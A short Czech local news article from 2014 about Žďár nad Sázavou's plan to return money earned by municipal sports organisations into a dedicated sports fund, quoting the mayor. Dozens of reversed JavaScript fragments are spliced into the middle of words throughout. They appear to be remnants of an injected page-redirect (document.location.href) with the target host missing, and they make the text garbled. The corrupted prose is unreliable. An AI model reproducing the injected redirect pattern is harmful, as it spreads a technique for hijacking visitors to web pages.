sport, peníze
Rainbow page separator

Peníze ze sportu se do něho vrátí zpět

Středa, 8. října 2014

Peníze, papírové bankovky

Žďár nad Sázavou / Zamezit nehospodárnému nakládání s financemi plánují zástupci žďárské radnice v souvislosti s výdělkem městských spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovních organizací. Ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to organizace dostanou možnost, jak si ušetřit finanční rezervu na nákladnější akce.
Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to účelu hodlá vytvořit fond, do kterého poputují peníze, které jednotlivé organizace během roku vydělají – každá ze spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovních organizací bude mít účet samostatný. Ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to finance následně nepůjdou do rozpočtu, ale vrátí se zpět k podpoře sportu.
„Věřím, že tím[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to způsobem organizace přestanou zbytečně plýtvat penězi,“ sdělil mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosta Žďáru nad Sázavou Ladislav Bárta.